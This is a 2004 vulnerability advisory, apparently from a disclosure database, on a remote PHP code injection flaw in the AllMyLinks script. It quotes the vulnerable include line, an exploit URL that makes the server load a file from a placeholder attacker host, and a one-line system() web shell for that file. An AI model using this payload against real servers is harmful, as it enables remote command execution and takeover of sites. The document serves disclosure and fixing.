AllMyLinks PHP Code Injection vulnerability

2004-02-17T00:00:00
ID SECURITYVULNS:DOC:5776
Type securityvulns
Reporter Securityvulns
Modified 2004-02-17T00:00:00

Description

* AllMyLinks PHP Code Injection vulnerability *

Product : AllMyLinks Vendor : www.php-resource.net Date : February 14, 2004 Problem : PHP Code Injection Vendor Contacted ? : No

**** Source ****

in /include/footer.inc.php


$AML_footer_get = require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php");


**** Exploit *******

http://[target]/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://[attacker]/&cmd=uname%20-a

in http://[attacker]/include/template.inc.php have :


<? system($cmd); ?>


**** Impact ****

Malicious user execute arbitrary commands on the server .

**** Solution ******

in /include/footer.inc.php replace

$AML_footer_get = require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php");

for

if (isset($_AMLconfig['cfg_serverpath'])){ die("Don\'t Hack it :)"); }

$AML_footer_get = require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php");

**** Credits ****

bnfx : bnfx@antisocial.com

Mad_Skater : m4dsk4t3r@hotmail.com

TechTeam Brazilian Crew .